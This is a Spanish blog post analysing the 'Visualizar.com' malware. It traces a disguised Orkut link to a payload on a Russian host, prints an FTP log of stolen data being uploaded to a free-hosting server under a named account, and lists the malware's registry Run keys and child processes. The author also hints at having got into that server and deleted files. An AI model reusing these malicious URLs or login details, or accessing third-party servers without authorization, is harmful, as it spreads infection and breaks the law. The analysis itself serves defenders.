Aca está la muestra de hoy, de nuevo Visualizar.com, esta vez queriendo engañar con un falso link a orkut (la mayor red social brasilera, si no me equivoco, y de google) http://www.orkut.com.br/Main#Profile?uid=7282100705742116-0.13350, que en realidad nos envía a http://ow.ly/2foDE?orkut.com.br/Main#Profile?uid=7282100705742116?0.13350 (si, otra vez ocultado la dirección tras ow.ly) desde donde descargamos otro Visualizar.com, hospedado en un servidor ruso verimgsua.h1.ru/visualizar.php .
Esta vez hay un condimento extra a la usual descarga de imágenes y ejecutables que le siguen a la ejecución de visualizar.com y es una conexión a un servidor FTP. Los datos esta vez son subidos al servidor ftp de la siguiente manera:
220 ftp.xpg.com.br.
USER albumpng
331 Password required for albumpng
PASS
230 User albumpng logged in
TYPE I
200 Type set to I
SYST
215 UNIX Type: L8
PORT 192,168,206,153,19,137
200 PORT command successful.
LIST
150 Opening BINARY mode data connection for file list
226 Transfer complete
CWD lista
250 CWD command successful
PORT 192,168,206,153,19,138
200 PORT command successful.
STOR JUAN-AA57CF7254 [22:07:04] .txt
150 Opening BINARY mode data connection for JUAN-AA57CF7254 [22:07:04] .txt
226 Transfer complete
XPG resulta ser una empresa que brinda servicio de hosting gratuito... www.xpg.com.br.
Eliminé el password por razones obvias... pero dentro del ftp existe un directorio llamado lista donde al momento de escribir esta entrada hay mas de 300 archivos de equipos infectados. Cada archivo además de la información del equipo, recolecta e-mails de los usuarios del equipo, muchos.. muchos correos electrónicos para spam definitivamente.
Admito que mi portugues es muy malo, no logré encontrar en el sitio oficial de xpg un mail de contacto para avisarles de la situación, entonces...
Espero que los chicos tengan backup... sino se van a enojar mucho conmigo...
El reporte del día de hoy, corto pero conciso...
Aprovecho para agregar algo nuevo, esta vez durante toda la prueba utlicé un software de monitoreo que se llama CaptureBAT, si bien es un tanto "poco amigable" ofrece buen información:
Aca las dos claves del registro que hay que eliminar para que no se inicien los procesos maliciosos al arrancar la PC. A decir verdad, las claves de registro modificadas por Visualizar.com son demasiadas... a tal punto que el archivo de log pesa unos 1300Kb (de puro texto plano...)
juan@moon:~/Escritorio/test23julio/carpeta sin título$ cat salida_limpia.txt | grep Run
registry: SetValueKey C:\Arquivo de programas\mss.exe -> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msgrmsn
registry: SetValueKey C:\Arquivo de programas\satplg.exe -> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Aca vemos como a medida que se completa la descarga de los ejecutables comienzan a lanzarse los nuevos procesos entre ellos.
juan@moon:~/Escritorio/test23julio/carpeta sin título$ cat salida_limpia.txt | grep "process: created"
process: created C:\WINDOWS\explorer.exe -> C:\Documents and Settings\Administrador\Escritorio\Visualizar.com
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\wink.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\mstim.exe
process: created C:\Arquivo de programas\mstim.exe -> C:\WINDOWS\system32\dwwin.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\noix.exe
process: created C:\Arquivo de programas\noix.exe -> C:\WINDOWS\system32\net.exe
process: created C:\WINDOWS\system32\net.exe -> C:\WINDOWS\system32\net1.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\mss.exe
process: created C:\Documents and Settings\Administrador\Escritorio\Visualizar.com -> C:\Arquivo de programas\satplg.exe
No hay comentarios:
Publicar un comentario